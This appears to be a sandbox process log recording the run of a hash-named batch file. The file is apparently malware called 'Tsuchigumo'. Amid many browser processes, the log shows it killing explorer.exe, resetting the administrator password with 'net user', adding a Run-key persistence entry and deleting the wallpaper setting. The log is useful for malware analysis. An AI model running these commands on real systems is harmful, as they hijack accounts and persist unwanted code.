"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --instant-process --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=42 --always-read-main-dll --field-trial-handle=5716,i,13710717837850662364,14881490622649426260,262144 --variations-seed-version --mojo-platform-channel-handle=3584 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=44 --always-read-main-dll --field-trial-handle=6636,i,13710717837850662364,14881490622649426260,262144 --variations-seed-version --mojo-platform-channel-handle=4344 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5684,i,13710717837850662364,14881490622649426260,262144 --variations-seed-version --mojo-platform-channel-handle=3528 /prefetch:8

C:\Program Files\7-Zip\7zG.exe

"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\8d1d36a7ad23626341f658815bfd21a6274f703aca2126bddfad63fa749041be\" -ad -an -ai#7zMap21156:190:7zEvent32297

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6620,i,13710717837850662364,14881490622649426260,262144 --variations-seed-version --mojo-platform-channel-handle=5024 /prefetch:8

C:\Windows\System32\NOTEPAD.EXE

"C:\Windows\System32\NOTEPAD.EXE" C:\Users\Admin\Downloads\8d1d36a7ad23626341f658815bfd21a6274f703aca2126bddfad63fa749041be\8d1d36a7ad23626341f658815bfd21a6274f703aca2126bddfad63fa749041be.bat

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Downloads\8d1d36a7ad23626341f658815bfd21a6274f703aca2126bddfad63fa749041be\8d1d36a7ad23626341f658815bfd21a6274f703aca2126bddfad63fa749041be.bat" "

C:\Windows\system32\taskkill.exe

taskkill /f /im explorer.exe

C:\Windows\system32\net.exe

net user administrator 4217

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 user administrator 4217

C:\Windows\system32\reg.exe

reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v Tsuchigumo.bat /d "C:\Windows\system32\Tsuchigumo.bat" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Control Panel\Desktop" /v Wallpaper /f

C:\Windows\explorer.exe

"C:\Windows\explorer.exe"

C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe

"C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe" -ServerName:InputApp.AppXk0k6mrh4r2q0ct33a9wgbez0x7v9cz5y.mca

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\explorer.exe

explorer.exe

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe

"C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe" -ServerName:InputApp.AppXk0k6mrh4r2q0ct33a9wgbez0x7v9cz5y.mca

C:\Windows\explorer.exe

explorer.exe

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe

"C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe" -ServerName:InputApp.AppXk0k6mrh4r2q0ct33a9wgbez0x7v9cz5y.mca

C:\Windows\explorer.exe

explorer.exe

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe

"C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe" -ServerName:InputApp.AppXk0k6mrh4r2q0ct33a9wgbez0x7v9cz5y.mca

C:\Windows\explorer.exe

explorer.exe

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe"

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe"

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -prefsHandle 1996 -prefsLen 27100 -prefMapHandle 2000 -prefMapSize 270279 -ipcHandle 2088 -initialChannelId {cf100be8-2294-4b67-924c-1a28b4bad1f8} -parentPid 4192 -crashReporter "\\.\pipe\gecko-crash-server-pipe.4192" -appDir "C:\Program Files\Mozilla Firefox\browser" - 1 gpu

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -prefsHandle 2456 -prefsLen 27136 -prefMapHandle 2460 -prefMapSize 270279 -ipcHandle 2352 -initialChannelId {ea6a6bb9-2061-4fa0-81b9-96aa9f2d07b6} -parentPid 4192 -crashReporter "\\.\pipe\gecko-crash-server-pipe.4192" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 2 socket

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 3872 -prefsLen 27277 -prefMapHandle 3876 -prefMapSize 270279 -jsInitHandle 3880 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 3888 -initialChannelId {8cb57d87-1612-4d70-9299-0c7c3e2dd7b0} -parentPid 4192 -crashReporter "\\.\pipe\gecko-crash-server-pipe.4192" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 3 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -prefsHandle 4044 -prefsLen 27277 -prefMapHandle 4048 -prefMapSize 270279 -ipcHandle 4148 -initialChannelId {934fac5d-d6b9-4071-9951-1037fe04c929} -parentPid 4192 -crashReporter "\\.\pipe\gecko-crash-server-pipe.4192" -appDir "C:\Program Files\Mozilla Firefox\browser" - 4 rdd

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 4516 -prefsLen 34776 -prefMapHandle 4520 -prefMapSize 270279 -jsInitHandle 4524 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 3104 -initialChannelId {6a3c3fc0-959c-4382-8432-5b332968fe16} -parentPid 4192 -crashReporter "\\.\pipe\gecko-crash-server-pipe.4192" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 5 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -sandboxingKind 0 -prefsHandle 4996 -prefsLen 35013 -prefMapHandle 5000 -prefMapSize 270279 -ipcHandle 5008 -initialChannelId {9646553d-9121-4fe2-8d04-e043c3e815c8} -parentPid 4192 -crashReporter "\\.\pipe\gecko-crash-server-pipe.4192" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 6 utility

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 2736 -prefsLen 32952 -prefMapHandle 2740 -prefMapSize 270279 -jsInitHandle 2744 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 4088 -initialChannelId {093b4033-a523-441b-bd2f-0876a43d0606} -parentPid 4192 -crashReporter "\\.\pipe\gecko-crash-server-pipe.4192" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 7 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 4092 -prefsLen 32952 -prefMapHandle 3064 -prefMapSize 270279 -jsInitHandle 3208 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 5572 -initialChannelId {8e7b1b81-d775-44bc-85e3-decf504334d0} -parentPid 4192 -crashReporter "\\.\pipe\gecko-crash-server-pipe.4192" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 8 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 5680 -prefsLen 32952 -prefMapHandle 5684 -prefMapSize 270279 -jsInitHandle 5688 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 3064 -initialChannelId {0a844bbe-c5fc-4dcf-99a9-dadc3204b4b2} -parentPid 4192 -crashReporter "\\.\pipe\gecko-crash-server-pipe.4192" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 9 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 5840 -prefsLen 32952 -prefMapHandle 5844 -prefMapSize 270279 -jsInitHandle 5848 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 5856 -initialChannelId {9ae096be-d918-4601-9f32-14ee8fb92ef0} -parentPid 4192 -crashReporter "\\.\pipe\gecko-crash-server-pipe.4192" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 10 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 5900 -prefsLen 32952 -prefMapHandle 5904 -prefMapSize 270279 -jsInitHandle 5908 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 5916 -initialChannelId {78b4221d-c8fb-4301-99ea-3711501afe2a} -parentPid 4192 -crashReporter "\\.\pipe\gecko-crash-server-pipe.4192" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 11 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 6088 -prefsLen 32952 -prefMapHandle 6092 -prefMapSize 270279 -jsInitHandle 6096 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 6104 -initialChannelId {82a4c713-8ca8-421f-81fb-6cfbc8e4de91} -parentPid 4192 -crashReporter "\\.\pipe\gecko-crash-server-pipe.4192" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 12 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 6300 -prefsLen 32952 -prefMapHandle 6304 -prefMapSize 270279 -jsInitHandle 6308 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 6316 -initialChannelId {4599cb2d-c725-4e90-8eaa-9f6f4d11974b} -parentPid 4192 -crashReporter "\\.\pipe\gecko-crash-server-pipe.4192" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 13 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 6488 -prefsLen 32952 -prefMapHandle 6492 -prefMapSize 270279 -jsInitHandle 6496 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 6504 -initialChannelId {59312b7a-b589-47f2-b759-c7b0e5224fd2} -parentPid 4192 -crashReporter "\\.\pipe\gecko-crash-server-pipe.4192" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 14 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 6676 -prefsLen 32952 -prefMapHandle 6680 -prefMapSize 270279 -jsInitHandle 6684 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 6692 -initialChannelId {afb744f3-a5cd-4a76-a2ea-cd3c60ca72e3} -parentPid 4192 -crashReporter "\\.\pipe\gecko-crash-server-pipe.4192" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 15 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 6864 -prefsLen 32952 -prefMapHandle 6868 -prefMapSize 270279 -jsInitHandle 6872 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 6880 -initialChannelId {63085a67-25bf-47c0-b959-7d3e63cd6a8d} -parentPid 4192 -crashReporter "\\.\pipe\gecko-crash-server-pipe.4192" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 16 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 7076 -prefsLen 32952 -prefMapHandle 7080 -prefMapSize 270279 -jsInitHandle 7084 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 7088 -initialChannelId {c081b01e-9395-405b-b414-c81d68a21da6} -parentPid 4192 -crashReporter "\\.\pipe\gecko-crash-server-pipe.4192" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 17 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 7284 -prefsLen 32952 -prefMapHandle 7288 -prefMapSize 270279 -jsInitHandle 7292 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 7300 -initialChannelId {74a5be6f-7089-4dd8-a793-e7bd280996e6} -parentPid 4192 -crashReporter "\\.\pipe\gecko-crash-server-pipe.4192" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 18 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 7328 -prefsLen 32952 -prefMapHandle 7316 -prefMapSize 270279 -jsInitHandle 7416 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 7488 -initialChannelId {d9558668-c643-455b-a073-305d17cf2027} -parentPid 4192 -crashReporter "\\.\pipe\gecko-crash-server-pipe.4192" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 19 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 7660 -prefsLen 32952 -prefMapHandle 7664 -prefMapSize 270279 -jsInitHandle 7668 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 7676 -initialChannelId {91721b9e-3c1d-4f9d-b530-972ac4cf62c9} -parentPid 4192 -crashReporter "\\.\pipe\gecko-crash-server-pipe.4192" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 20 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 7848 -prefsLen 32952 -prefMapHandle 7852 -prefMapSize 270279 -jsInitHandle 7856 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 7864 -initialChannelId {68c2e1b8-cdb2-40c0-80a8-3fbd3b9fe732} -parentPid 4192 -crashReporter "\\.\pipe\gecko-crash-server-pipe.4192" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 21 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 8036 -prefsLen 32952 -prefMapHandle 8040 -prefMapSize 270279 -jsInitHandle 8044 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 8052 -initialChannelId {44f8ba09-8d1b-41c3-ae8a-6f935b52ba8f} -parentPid 4192 -crashReporter "\\.\pipe\gecko-crash-server-pipe.4192" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 22 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 8228 -prefsLen 32952 -prefMapHandle 8232 -prefMapSize 270279 -jsInitHandle 8236 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 8244 -initialChannelId {56eb42ed-c588-4968-ae13-5426e5cbf55b} -parentPid 4192 -crashReporter "\\.\pipe\gecko-crash-server-pipe.4192" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 23 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 8440 -prefsLen 32952 -prefMapHandle 8444 -prefMapSize 270279 -jsInitHandle 8448 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 8456 -initialChannelId {347f31cb-dc05-45a1-9e9c-cfcb0520cf3a} -parentPid 4192 -crashReporter "\\.\pipe\gecko-crash-server-pipe.4192" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 24 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 8600 -prefsLen 32952 -prefMapHandle 8604 -prefMapSize 270279 -jsInitHandle 8608 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 5628 -initialChannelId {68a142d0-e6da-4bd3-899c-c2569c0a692c} -parentPid 4192 -crashReporter "\\.\pipe\gecko-crash-server-pipe.4192" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 25 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 5896 -prefsLen 32952 -prefMapHandle 5892 -prefMapSize 270279 -jsInitHandle 6036 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 8644 -initialChannelId {0baa711d-8e72-487e-b860-8b6e42b71519} -parentPid 4192 -crashReporter "\\.\pipe\gecko-crash-server-pipe.4192" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 26 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 8764 -prefsLen 32952 -prefMapHandle 8768 -prefMapSize 270279 -jsInitHandle 8772 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 8776 -initialChannelId {e5de97bf-f7fe-4890-b67f-d106e8431157} -parentPid 4192 -crashReporter "\\.\pipe\gecko-crash-server-pipe.4192" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 27 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 8948 -prefsLen 32952 -prefMapHandle 8952 -prefMapSize 270279 -jsInitHandle 8956 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 8964 -initialChannelId {b10f0107-0a23-4f05-8108-5774f6e1aab1} -parentPid 4192 -crashReporter "\\.\pipe\gecko-crash-server-pipe.4192" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 28 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 7036 -prefsLen 32952 -prefMapHandle 7032 -prefMapSize 270279 -jsInitHandle 7028 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 7016 -initialChannelId {07c18d23-d063-4651-b5b1-7a2bbaa160a5} -parentPid 4192 -crashReporter "\\.\pipe\gecko-crash-server-pipe.4192" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 29 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 7656 -prefsLen 32952 -prefMapHandle 7632 -prefMapSize 270279 -jsInitHandle 7628 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 7620 -initialChannelId {b429cafd-bdfa-4c8c-8539-d5807be5c49d} -parentPid 4192 -crashReporter "\\.\pipe\gecko-crash-server-pipe.4192" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 30 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 7604 -prefsLen 32952 -prefMapHandle 7504 -prefMapSize 270279 -jsInitHandle 7516 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 7316 -initialChannelId {629840ce-9743-49bd-90e6-2165e5079fde} -parentPid 4192 -crashReporter "\\.\pipe\gecko-crash-server-pipe.4192" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 31 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 9312 -prefsLen 32952 -prefMapHandle 9316 -prefMapSize 270279 -jsInitHandle 9320 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 9332 -initialChannelId {6d49cf93-407e-430d-b55f-f3b334e11bf0} -parentPid 4192 -crashReporter "\\.\pipe\gecko-crash-server-pipe.4192" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 32 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 9344 -prefsLen 32952 -prefMapHandle 9348 -prefMapSize 270279 -jsInitHandle 9352 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 9364 -initialChannelId {d6577547-e3e4-4cf3-b477-a9a14dbebd2d} -parentPid 4192 -crashReporter "\\.\pipe\gecko-crash-server-pipe.4192" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 33 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 9376 -prefsLen 32952 -prefMapHandle 9380 -prefMapSize 270279 -jsInitHandle 9384 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 9396 -initialChannelId {e776b697-df1c-4a1d-812d-7309cb88b64e} -parentPid 4192 -crashReporter "\\.\pipe\gecko-crash-server-pipe.4192" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 34 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 9880 -prefsLen 32952 -prefMapHandle 9884 -prefMapSize 270279 -jsInitHandle 9888 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 9896 -initialChannelId {72582720-248b-4daa-b2a7-b64694aa2aba} -parentPid 4192 -crashReporter "\\.\pipe\gecko-crash-server-pipe.4192" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 35 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 9908 -prefsLen 32952 -prefMapHandle 9912 -prefMapSize 270279 -jsInitHandle 9916 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 9928 -initialChannelId {8d2cf194-9c33-46cd-aeb3-d22eb2e88bd8} -parentPid 4192 -crashReporter "\\.\pipe\gecko-crash-server-pipe.4192" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 36 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 9940 -prefsLen 32952 -prefMapHandle 9944 -prefMapSize 270279 -jsInitHandle 9948 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 9956 -initialChannelId {31a6a4b3-960f-4aaf-878c-7208dc251229} -parentPid 4192 -crashReporter "\\.\pipe\gecko-crash-server-pipe.4192" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 37 tab

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=47 --always-read-main-dll --field-trial-handle=6308,i,13710717837850662364,14881490622649426260,262144 --variations-seed-version --mojo-platform-channel-handle=1352 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=48 --always-read-main-dll --field-trial-handle=4840,i,13710717837850662364,14881490622649426260,262144 --variations-seed-version --mojo-platform-channel-handle=3376 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=49 --always-read-main-dll --field-trial-handle=6684,i,13710717837850662364,14881490622649426260,262144 --variations-seed-version --mojo-platform-channel-handle=4212 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=3456,i,13710717837850662364,14881490622649426260,262144 --variations-seed-version --mojo-platform-channel-handle=2988 /prefetch:8

C:\Windows\System32\rundll32.exe

C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding

C:\Program Files\7-Zip\7zG.exe

"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\d765e722e295969c0a5c2d90f549db8b89ab617900bf4698db41c7cdad993bb9\" -ad -an -ai#7zMap30351:190:7zEvent13546

